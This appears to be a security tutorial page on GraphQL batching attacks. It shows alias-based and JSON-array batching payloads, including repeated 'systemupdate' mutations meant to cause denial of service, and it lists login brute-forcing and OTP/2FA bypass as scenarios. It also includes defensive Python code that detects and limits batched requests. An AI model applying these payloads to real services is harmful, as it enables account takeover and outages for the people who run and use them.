😎Batching Attacks
Batching in GraphQL simply means that many GraphQL operations can be performed in a single request. An attacker can abuse this to brute-force a login or to make the service unavailable.
Types of batching attacks:
query name based batching
query json based batching
👏Query name based batching
In this type of attack, multiple queries for the same operation are grouped together under different aliases and sent in a single request.
{"query": "query{
first:character(id:2){
name id
}
second:character(id:3){
name id
}
third:character(id:3){
name id
}
}"
}

Flaw: if we send many aliased copies of an operation that takes a long time to execute, such as a system update, this can lead to a denial of service on the GraphQL server.
mutation{
first:systemupdate
second:systemupdate
third:systemupdate
}

👏Query json based batching
In this type of attack, multiple queries are sent to the GraphQL server as a JSON array in a single request.
[
{
"query": "query { user(id: 1) { name } }"
},
{
"query": "query { user(id: 2) { name } }"
}
]

Flaw: same as query name based batching.
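Both batching styles above can be measured before any resolver runs, which is where a server would enforce a limit. The following is an added example, not code from the original page or from any GraphQL server project: a request-inspection function that counts the two batching dimensions (the number of entries in a JSON-array body, and the number of root selections, aliased or not, inside each query) using a small heuristic tokenizer rather than a full GraphQL parser. The limit values MAX_BATCH and MAX_ROOT_FIELDS are hypothetical policy choices, and the sample request bodies are constructed from the three examples on this page.

```python
import json
import re

# Hypothetical policy values for this example: disable JSON-array batching
# entirely and allow at most two root selections per operation.
MAX_BATCH = 1
MAX_ROOT_FIELDS = 2

# Lightweight tokenizer for GraphQL documents (a heuristic, not a full parser).
_TOKEN = re.compile(r'''
    """[\s\S]*?"""              # block string, kept as one token
  | "(?:\\.|[^"\\])*"           # string literal (braces inside are harmless)
  | \#[^\n]*                    # line comment
  | \.\.\.                      # fragment spread / inline fragment
  | \$?[A-Za-z_][A-Za-z0-9_]*   # name or variable
  | -?\d[\d.eE+\-]*             # number
  | [{}()\[\]:@=!|]             # punctuators
''', re.VERBOSE)


def _is_name(tok: str) -> bool:
    return tok[0] == "_" or tok[0].isalpha()


def count_root_fields(query: str) -> int:
    """Count selections (aliased or not) in the top-level selection set(s).

    Walks the token stream tracking brace depth (selection sets) and paren
    depth (arguments), and counts every selection that starts at depth 1.
    An aliased field such as `first:character(id:2)` counts once.
    """
    depth = parens = count = 0
    prev = ""
    for m in _TOKEN.finditer(query):
        tok = m.group(0)
        if tok.startswith("#"):
            continue                      # comments never affect structure
        if tok == "(":
            parens += 1
        elif tok == ")":
            parens -= 1
        elif tok == "{":
            depth += 1
        elif tok == "}":
            depth -= 1
        elif depth == 1 and parens == 0:
            if tok == "...":
                count += 1                # fragment spread / inline fragment
            elif _is_name(tok) and prev not in (":", "@", "...", "on"):
                count += 1                # alias or plain field name
        prev = tok
    return count


def inspect_request(body: str) -> dict:
    """Measure both batching dimensions of a raw JSON request body.

    "operations" is the number of entries when the body is a JSON array
    (query-JSON batching); "max_root_fields" is the largest root-selection
    count across those entries (query-name / alias batching).
    """
    payload = json.loads(body)
    ops = payload if isinstance(payload, list) else [payload]
    counts = [count_root_fields(op.get("query", "")) for op in ops]
    return {"operations": len(ops), "max_root_fields": max(counts, default=0)}


def check_request(body: str, max_batch: int = MAX_BATCH,
                  max_root_fields: int = MAX_ROOT_FIELDS) -> tuple:
    """Return (allowed, reason); meant to run before any resolver executes."""
    stats = inspect_request(body)
    if stats["operations"] > max_batch:
        return False, f"json batching: {stats['operations']} operations > {max_batch}"
    if stats["max_root_fields"] > max_root_fields:
        return False, f"alias batching: {stats['max_root_fields']} root fields > {max_root_fields}"
    return True, "ok"


# Constructed request bodies mirroring the examples on this page.
ALIAS_BATCH = json.dumps({"query": "query{ first:character(id:2){ name id } "
                                   "second:character(id:3){ name id } "
                                   "third:character(id:3){ name id } }"})
JSON_BATCH = json.dumps([{"query": "query { user(id: 1) { name } }"},
                         {"query": "query { user(id: 2) { name } }"}])
MUTATION_BATCH = json.dumps({"query": "mutation{ first:systemupdate "
                                      "second:systemupdate third:systemupdate }"})
SINGLE = json.dumps({"query": "query { user(id: 1) { name } }"})

if __name__ == "__main__":
    for label, body in [("alias", ALIAS_BATCH), ("json", JSON_BATCH),
                        ("mutation", MUTATION_BATCH), ("single", SINGLE)]:
        print(label, inspect_request(body), check_request(body))
```

The tokenizer deliberately treats string literals and comments as opaque so that a `{` inside an argument value cannot skew the depth count, and it ignores everything inside parentheses so argument names are not mistaken for selections. In a real deployment the same counts are better taken from the parsed AST during the server's validation phase, alongside a depth and cost limit and per-account rate limiting, since a single aliased mutation can still carry the full cost of a brute-force attempt in one HTTP request.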
Scenarios of exploiting GraphQL batching
brute-forcing a login
2FA bypass [brute-forcing an OTP using batching]
denial of service using heavy queries [system update]
MORE RESOURCES :